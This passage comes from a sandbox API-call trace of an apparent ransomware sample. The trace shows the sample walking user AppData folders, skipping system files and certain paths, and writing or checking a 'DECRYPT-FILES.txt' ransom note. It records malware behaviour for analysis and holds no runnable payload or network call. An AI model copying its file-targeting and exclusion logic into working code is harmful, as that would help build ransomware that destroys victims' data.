(lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.614] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.614] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.614] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.614] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.614] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.614] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.614] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.614] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.614] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.614] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.614] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned 96 [0180.614] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.614] lstrcpyW (in: lpString1=0x36fddf0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\" [0180.614] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\0a16c9.tmp" [0180.614] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.614] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\VRLZOZ0E\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\internet explorer\\userdata\\low\\vrlzoz0e\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.615] CloseHandle (hObject=0x0) returned 0 [0180.615] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.615] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaabe2a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaabe2a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.615] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.615] FindNextFileW (in: hFindFile=0x4799f8, lpFindFileData=0x36fe620 | out: lpFindFileData=0x36fe620*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaabe2a0, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaabe2a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.615] FindClose (in: hFindFile=0x4799f8 | out: hFindFile=0x4799f8) returned 1 [0180.615] CloseHandle (hObject=0x284) returned 1 [0180.615] FindNextFileW (in: hFindFile=0x4799b8, lpFindFileData=0x36fe89c | out: lpFindFileData=0x36fe89c*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b9d5d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaaabe2a0, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaabe2a0, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="VRLZOZ0E\\", cAlternateFileName="")) returned 0 [0180.615] FindClose (in: hFindFile=0x4799b8 | out: hFindFile=0x4799b8) returned 1 [0180.615] CloseHandle (hObject=0x27c) returned 1 [0180.615] FindNextFileW (in: hFindFile=0x479978, lpFindFileData=0x36feb18 | out: lpFindFileData=0x36feb18*(dwFileAttributes=0x2016, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaaa25d20, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaa25d20, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Low\\", cAlternateFileName="")) returned 0 [0180.615] FindClose (in: hFindFile=0x479978 | out: hFindFile=0x479978) returned 1 [0180.615] CloseHandle (hObject=0x274) returned 1 [0180.616] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54b77470, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xaa9b3900, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa9b3900, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="UserData\\", cAlternateFileName="")) returned 0 [0180.616] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.616] CloseHandle (hObject=0x26c) returned 1 [0180.616] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f5d6350, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MMC", cAlternateFileName="")) returned 1 [0180.616] lstrcmpW (lpString1="MMC", lpString2=".") returned 1 [0180.616] lstrcmpW (lpString1="MMC", lpString2="..") returned 1 [0180.616] lstrcatW (in: lpString1="MMC", lpString2="\\" | out: lpString1="MMC\\") returned="MMC\\" [0180.616] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="MMC\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\" [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\Program Files") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch=":\\Windows") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\Games\\") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\All Users") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="AhnLab") returned 0x0 [0180.616] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.616] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned 60 [0180.616] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.616] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\\\0a16c9.tmp") returned 71 [0180.616] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\mmc\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.617] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned 60 [0180.617] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.617] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\\\DECRYPT-FILES.txt") returned 78 [0180.617] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\mmc\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.617] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned 60 [0180.617] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*" [0180.617] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f5d6350, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.617] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.617] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x2f5d6350, ftCreationTime.dwHighDateTime=0x1d2fa9b, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.617] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.617] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.617] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeec7dc00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.617] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.617] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.617] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.618] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.618] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.618] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.618] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.618] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.618] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.618] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.618] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.618] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.618] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.618] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0180.618] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0180.618] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned 60 [0180.618] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.618] lstrcpyW (in: lpString1=0x36fe564, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\" [0180.618] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\", lpString2="0a16c9.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\0a16c9.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\0a16c9.tmp" [0180.618] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0x750000 [0180.618] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MMC\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\mmc\\0a16c9.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.618] CloseHandle (hObject=0x0) returned 0 [0180.618] VirtualFree (lpAddress=0x750000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0180.619] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaae4400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0180.619] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0180.619] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaaae4400, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 0 [0180.619] FindClose (in: hFindFile=0x479938 | out: hFindFile=0x479938) returned 1 [0180.619] CloseHandle (hObject=0x26c) returned 1 [0180.619] FindNextFileW (in: hFindFile=0x4798f8, lpFindFileData=0x36ff010 | out: lpFindFileData=0x36ff010*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xaaae4400, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaaae4400, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="MS Project", cAlternateFileName="MSPROJ~1")) returned 1 [0180.619] lstrcmpW (lpString1="MS Project", lpString2=".") returned 1 [0180.619] lstrcmpW (lpString1="MS Project", lpString2="..") returned 1 [0180.619] lstrcatW (in: lpString1="MS Project", lpString2="\\" | out: lpString1="MS Project\\") returned="MS Project\\" [0180.619] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="MS Project\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\" [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\Program Files") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch=":\\Windows") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\Games\\") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\Tor Browser\\") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\ProgramData\\") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\All Users") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\IETldCache\\") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\Local Settings\\") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="\\AppData\\Local") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="AhnLab") returned 0x0 [0180.619] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0180.619] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned 67 [0180.619] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.619] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\\\0a16c9.tmp") returned 78 [0180.619] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\\\0a16c9.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\0a16c9.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x26c [0180.620] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned 67 [0180.620] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0180.620] wsprintfW (in: param_1=0x36fe574, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\\\DECRYPT-FILES.txt") returned 85 [0180.620] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\ms project\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0180.621] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\") returned 67 [0180.621] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*" [0180.621] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\MS Project\\*", lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x479938 [0180.621] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0180.621] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8d940a0, ftCreationTime.dwHighDateTime=0x1d305fe, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0180.621] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0180.621] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0180.621] FindNextFileW (in: hFindFile=0x479938, lpFindFileData=0x36fed94 | out: lpFindFileData=0x36fed94*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xeec7dc00, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xeec7dc00, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xeec7dc00, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="0a16c9.tmp", cAlternateFileName="")) returned 1 [0180.621] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="DECRYPT-FILES.txt") returned -1 [0180.621] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="autorun.inf") returned -1 [0180.621] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="boot.ini") returned -1 [0180.621] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="desktop.ini") returned -1 [0180.621] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat") returned -1 [0180.621] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="iconcache.db") returned -1 [0180.621] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="bootsect.bak") returned -1 [0180.621] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="ntuser.dat.log") returned -1 [0180.621] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="thumbs.db") returned -1 [0180.621] lstrcmpiW (lpString1="0a16c9.tmp", lpString2="Bootfont.bin") returned -1 [0180.621] lstrlenW (lpString="0a16c9.tmp") returned 10 [0180.621] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0180.621] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0180.621] lstrcmpiW (lpString1="tmp", 